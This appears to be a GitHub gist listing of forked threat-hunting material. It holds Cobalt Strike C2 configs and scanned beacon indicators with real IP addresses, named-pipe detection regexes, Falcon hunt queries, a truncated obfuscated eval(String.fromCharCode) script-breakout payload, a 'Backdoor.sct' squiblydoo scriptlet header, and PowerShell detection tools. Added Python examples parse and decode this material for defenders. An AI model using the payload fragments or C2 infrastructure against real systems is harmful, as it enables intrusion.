@cbresponse
cbresponse / Cobalt Strike - C2
Created September 19, 2021 07:17 — forked from MichaelKoczwara/Cobalt Strike - C2
Cobalt Strike/C2
{
  "Ip": "42.193.225.116",
  "Ports": ["42.193.225.116:22", "42.193.225.116:8888"],
  "DefaultBeaconResponses": {
    "http://42.193.225.116:8888/": "302/219"
  },
  "Jarm": "",
  "Certificate": "",
  "Beacons": null
}
@cbresponse
cbresponse / scanning_cobaltstrike_config.csv
Created September 16, 2021 17:20 — forked from svch0stz/scanning_cobaltstrike_config.csv
scanning_cobaltstrike_config.csv
ip,port,time_scanned,arch,Beacon Type,Port,Polling,Jitter,Max DNS,C2 Server,User Agent,HTTP Method Path 2,Header 1,Header 2,Injection Process,Pipe Name,Year,Month,Day,DNS Idle,DNS Sleep,Method 1,Method 2,Spawn To,Proxy Hostname,Proxy Username,Proxy Password,Proxy Access Type,CreateRemoteThread,Watermark
185.20.186.108,443,1.62002E+12,x86,8 (HTTPS),443,5000,0,,"185.20.186.108,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books",,/N4215/adj/amzn.us.sr.aps,,,,,,,,,,GET,POST,%windir%\syswow64\rundll32.exe,,,,,,1359593325
185.20.186.108,443,1.62002E+12,x64,8 (HTTPS),443,5000,0,,"185.20.186.108,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books",,/N4215/adj/amzn.us.sr.aps,,,,,,,,,,GET,POST,%windir%\sysnative\rundll32.exe,,,,,,1359593325
213.202.211.246,80,1.62002E+12,x86,0 (HTTP),80,10000,5,,"213.202.211.246,/metro91/admin/1/ppptp.jpg",,/metro91/admin/1/secure.php,,,,,,,,,,GET,POST,%windir%\syswow64\rundll32.exe,,,,,,0
213.202.211.246,80,1.62002E+12,x64,0 (HTTP),80,10000,5,,"213.202.211.246,/metr
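As an added example (not part of the gist), the scan CSV above parsed in Python. Two things about the format matter: the "C2 Server" field carries host and URI separated by a comma, which is why it is the one quoted field, and the last preview row is cut off inside that quote, which is exactly the "unclosed quoted field" a strict parser complains about. The sample CSV in the code is constructed from the rows shown above; the per-host indicator grouping and the watermark-0 flag are this example's own logic, not something the gist does.

```python
import csv
import io

# Constructed sample: the header and first rows of the page's
# scanning_cobaltstrike_config.csv. The last row is cut off exactly as it is on
# the page, inside the quoted "C2 Server" field. A raw string keeps the
# backslashes in the "Spawn To" paths intact.
SAMPLE_CSV = r'''ip,port,time_scanned,arch,Beacon Type,Port,Polling,Jitter,Max DNS,C2 Server,User Agent,HTTP Method Path 2,Header 1,Header 2,Injection Process,Pipe Name,Year,Month,Day,DNS Idle,DNS Sleep,Method 1,Method 2,Spawn To,Proxy Hostname,Proxy Username,Proxy Password,Proxy Access Type,CreateRemoteThread,Watermark
185.20.186.108,443,1.62002E+12,x86,8 (HTTPS),443,5000,0,,"185.20.186.108,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books",,/N4215/adj/amzn.us.sr.aps,,,,,,,,,,GET,POST,%windir%\syswow64\rundll32.exe,,,,,,1359593325
185.20.186.108,443,1.62002E+12,x64,8 (HTTPS),443,5000,0,,"185.20.186.108,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books",,/N4215/adj/amzn.us.sr.aps,,,,,,,,,,GET,POST,%windir%\sysnative\rundll32.exe,,,,,,1359593325
213.202.211.246,80,1.62002E+12,x86,0 (HTTP),80,10000,5,,"213.202.211.246,/metro91/admin/1/ppptp.jpg",,/metro91/admin/1/secure.php,,,,,,,,,,GET,POST,%windir%\syswow64\rundll32.exe,,,,,,0
213.202.211.246,80,1.62002E+12,x64,0 (HTTP),80,10000,5,,"213.202.211.246,/metr
'''


def parse_beacon_configs(text):
    """Split the scan CSV into fully parsed rows and rows that were cut off.

    In its default (non-strict) mode the csv module returns an unterminated
    quoted field at end of input as whatever it managed to read, so a truncated
    row shows up as a short row rather than as an exception; a strict dialect
    would raise csv.Error instead. Both cases end up in `truncated`.
    """
    reader = csv.reader(io.StringIO(text))
    header = next(reader)
    complete, truncated = [], []
    try:
        for row in reader:
            if not row:
                continue  # blank line
            if len(row) < len(header):
                truncated.append(row)
            else:
                complete.append(dict(zip(header, row)))
    except csv.Error as exc:
        truncated.append([f"<unparseable tail: {exc}>"])
    return complete, truncated


def extract_indicators(rows):
    """Collapse the per-architecture rows into one indicator set per C2 host.

    "C2 Server" is "host,uri" (hence the quoting); the second request URI is in
    "HTTP Method Path 2". A watermark of 0 is the value commonly seen on cracked
    or trial Cobalt Strike builds, so it is flagged for the analyst.
    """
    indicators = {}
    for row in rows:
        host, _, uri = row["C2 Server"].partition(",")
        entry = indicators.setdefault(host, {
            "ports": set(),
            "uris": set(),
            "spawn_to": set(),
            "beacon_type": row["Beacon Type"],
            "watermark": row["Watermark"],
            "watermark_suspicious": row["Watermark"] == "0",
        })
        entry["ports"].add(int(row["port"]))
        entry["uris"].update({uri, row["HTTP Method Path 2"]})
        entry["spawn_to"].add(row["Spawn To"])
    return indicators


if __name__ == "__main__":
    complete, truncated = parse_beacon_configs(SAMPLE_CSV)
    for host, ind in extract_indicators(complete).items():
        flag = " (watermark 0: likely cracked/trial build)" if ind["watermark_suspicious"] else ""
        print(f"{host} {ind['beacon_type']} watermark={ind['watermark']}{flag}")
        for uri in sorted(ind["uris"]):
            print(f"  uri      {uri}")
        for exe in sorted(ind["spawn_to"]):
            print(f"  spawn_to {exe}")
    print(f"{len(truncated)} row(s) truncated and skipped")
```

The x86 and x64 rows for one host differ only in the sysnative/syswow64 spawn-to path, so grouping by host gives one block-list entry per server rather than one per architecture.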
Regex                                            Source
MSSE-[0-9a-f]{3}-server                          Default Cobalt Strike Artifact Kit binaries
status_[0-9a-f]{2}                               Default psexec_psh
postex_ssh_[0-9a-f]{4}                           Default SSH beacon
msagent_[0-9a-f]{2}                              Default SMB beacon
postex_[0-9a-f]{4}                               Default Post Exploitation job (v4.2+)
mojo.5688.8052.183894939787088877[0-9a-f]{2}     jquery-c2.4.2.profile
mojo.5688.8052.35780273329370473[0-9a-f]{2}      jquery-c2.4.2.profile
wkssvc[0-9a-f]{2}                                jquery-c2.4.2.profile
ntsvcs[0-9a-f]{2}                                trick_ryuk.profile
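An added example, not from the gist, that applies the table above to named-pipe telemetry in Python. The regexes are compiled as listed (with the literal dots escaped) and matched against the pipe name after the leading "\" or "\\.\pipe\" prefix is stripped. The events are constructed in the shape of Sysmon Event ID 17 (PipeCreate) and 18 (PipeConnected) records, with made-up hosts, images and pipe names; anchoring the match with fullmatch is this example's choice, and it is what keeps the legitimate Windows pipes "\ntsvcs" and "\lsass" quiet while "\ntsvcs7b" fires.

```python
import re

# The regex/source pairs from the table above, with the literal dots escaped.
PIPE_PATTERNS = [
    (r"MSSE-[0-9a-f]{3}-server", "Default Cobalt Strike Artifact Kit binaries"),
    (r"status_[0-9a-f]{2}", "Default psexec_psh"),
    (r"postex_ssh_[0-9a-f]{4}", "Default SSH beacon"),
    (r"msagent_[0-9a-f]{2}", "Default SMB beacon"),
    (r"postex_[0-9a-f]{4}", "Default Post Exploitation job (v4.2+)"),
    (r"mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}", "jquery-c2.4.2.profile"),
    (r"mojo\.5688\.8052\.35780273329370473[0-9a-f]{2}", "jquery-c2.4.2.profile"),
    (r"wkssvc[0-9a-f]{2}", "jquery-c2.4.2.profile"),
    (r"ntsvcs[0-9a-f]{2}", "trick_ryuk.profile"),
]
COMPILED = [(re.compile(p), src) for p, src in PIPE_PATTERNS]

# Sysmon logs the name as "\MSSE-1c4-server"; other tools use "\\.\pipe\..." or
# "\pipe\...". Strip whichever prefix is present before matching.
_PIPE_PREFIX = re.compile(r"^(?:\\\\\.\\pipe\\|\\pipe\\|\\)", re.IGNORECASE)


def classify_pipe(pipe_name):
    """Return the source a pipe name matches, or None.

    fullmatch anchors the pattern to the whole name; unanchored, e.g.
    status_[0-9a-f]{2} would also fire on any longer name that merely contains
    "status_" followed by two hex characters.
    """
    name = _PIPE_PREFIX.sub("", pipe_name, count=1)
    for regex, source in COMPILED:
        if regex.fullmatch(name):
            return source
    return None


# Constructed events in the shape of Sysmon Event ID 17 (PipeCreate) and
# 18 (PipeConnected) records; hosts, images and pipe names are made up.
SAMPLE_EVENTS = [
    {"EventID": 17, "Computer": "WS01", "Image": r"C:\Users\bob\AppData\Local\Temp\update.exe", "PipeName": r"\MSSE-1c4-server"},
    {"EventID": 17, "Computer": "WS01", "Image": r"C:\Windows\System32\rundll32.exe", "PipeName": r"\msagent_3f"},
    {"EventID": 17, "Computer": "WS02", "Image": r"C:\Windows\System32\rundll32.exe", "PipeName": r"\postex_a1b2"},
    {"EventID": 17, "Computer": "WS02", "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\ntsvcs"},
    {"EventID": 17, "Computer": "WS02", "Image": r"C:\Windows\System32\rundll32.exe", "PipeName": r"\ntsvcs7b"},
    {"EventID": 17, "Computer": "WS03", "Image": r"C:\Windows\System32\rundll32.exe", "PipeName": r"\mojo.5688.8052.1838949397870888770a"},
    {"EventID": 17, "Computer": "WS03", "Image": r"C:\Windows\System32\lsass.exe", "PipeName": r"\lsass"},
    {"EventID": 18, "Computer": "WS03", "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "PipeName": r"\status_4e"},
]


def scan_events(events):
    """Run classify_pipe over pipe events and return the hits with context."""
    hits = []
    for ev in events:
        source = classify_pipe(ev["PipeName"])
        if source is not None:
            hits.append({
                "computer": ev["Computer"],
                "event_id": ev["EventID"],
                "image": ev["Image"],
                "pipe": ev["PipeName"],
                "source": source,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"{hit['computer']} evt{hit['event_id']} {hit['pipe']:<40} {hit['source']}  <- {hit['image']}")
```

The image that created the pipe is carried through on purpose: a profile-mimicking "mojo." pipe from rundll32.exe is a much stronger signal than the same name from chrome.exe, and that context is what turns a regex hit into something worth paging on.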
@cbresponse
cbresponse / FalconHuntqueries.md
Created January 5, 2021 10:13 — forked from ag-michael/FalconHuntqueries.md
Falcon hunt queries

timestamp convert (the timestamp field is epoch milliseconds, hence the /1000):

 convert ctime(timestamp/1000)

.top, .club, .xyz and .ru domain lookups seen more than once and fewer than four times, with the computers that requested each domain:

 aid=* event_simpleName=DnsRequest | regex DomainName=".*\.top$|.*\.club$|.*\.xyz$|.*\.ru$|[0-9]+.*\.\w$" | stats values(ComputerName) count by DomainName | where count>1 AND count<4 | sort - count
</script><script language=javascript>eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 115, 116, 114, 41, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 114, 61, 34, 34, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 101, 61, 115, 116, 114, 46, 108, 101, 110, 103, 116, 104, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 99, 61, 48, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 104, 59, 10, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 99, 60, 101, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 104, 61, 115, 116, 114, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 99, 43, 43, 41, 46, 116, 111, 83, 116, 114, 105, 110, 103, 40, 49, 54, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 104, 46, 108, 101, 110, 103, 116, 104, 60, 51, 41, 32, 104, 61, 34, 48, 34, 43, 104, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 43, 61, 104, 59, 10, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 114, 101, 116, 117, 114, 110, 32, 114, 59, 10, 125, 10, 36
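The snippet above is a JavaScript payload that hides its body as a list of character codes handed to eval(String.fromCharCode(...)); the argument list on the page decodes to the start of a small function named encodeToHex that hex-encodes a string three digits per character. As an added example (not from any of the gists), a Python decoder and triage helper that recovers such a body even when the argument list is cut off, run on a constructed sample built from the first codes shown above.

```python
import re

# Constructed sample: the opening of the encoded script above, with the
# String.fromCharCode argument list cut off the way the page's copy is.
SAMPLE_JS = (
    '</script><script language=javascript>eval(String.fromCharCode('
    '102, 117, 110, 99, 116, 105, 111, 110, 32, 101, 110, 99, 111, 100, 101, '
    '84, 111, 72, 101, 120, 40, 115, 116, 114, 41, 123'
)

# The closing parenthesis is optional so a call cut off mid-list still decodes
# as far as the text goes.
_FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([\d,\s]*)\)?")


def decode_fromcharcode_calls(js):
    """Decode every String.fromCharCode(...) call whose arguments are plain integers."""
    decoded = []
    for m in _FROMCHARCODE.finditer(js):
        codes = [int(x) for x in re.findall(r"\d+", m.group(1))]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def triage(js):
    """Summarise what a responder wants to know about a snippet like the one above.

    - breaks_out_of_script: a leading </script> is how a payload closes the
      script block it was injected into before opening its own.
    - eval_wrapped: the decoded text is executed, not merely displayed.
    - decoded: the recovered plaintext of each fromCharCode call.
    """
    return {
        "breaks_out_of_script": js.lstrip().lower().startswith("</script>"),
        "eval_wrapped": re.search(r"\beval\s*\(\s*String\.fromCharCode", js) is not None,
        "decoded": decode_fromcharcode_calls(js),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_JS)
    print("breaks out of <script>:", result["breaks_out_of_script"])
    print("wrapped in eval():    ", result["eval_wrapped"])
    for text in result["decoded"]:
        print("decoded:", text)
```

Decoding statically, as here, is preferable to running the sample in a JavaScript engine: the recovered text can itself contain further eval layers, and nothing executes while you read it.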
@cbresponse
cbresponse / Get-KerberosTicketGrantingTicket.ps1
Created June 29, 2019 05:21 — forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
{
<#
.SYNOPSIS
Gets the Kerberos Ticket Granting Tickets from all logon sessions.
.DESCRIPTION
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
@cbresponse
cbresponse / Backdoor.sct
Last active June 23, 2018 07:43 — forked from api0cradle/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@cbresponse
cbresponse / Get-InjectedThread.ps1
Created June 18, 2018 12:55 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
function Export-MFT {
<#
.SYNOPSIS
Extracts master file table from volume.
Version: 0.1
Author : Jesse Davis (@secabstraction)
License: BSD 3-Clause
.DESCRIPTION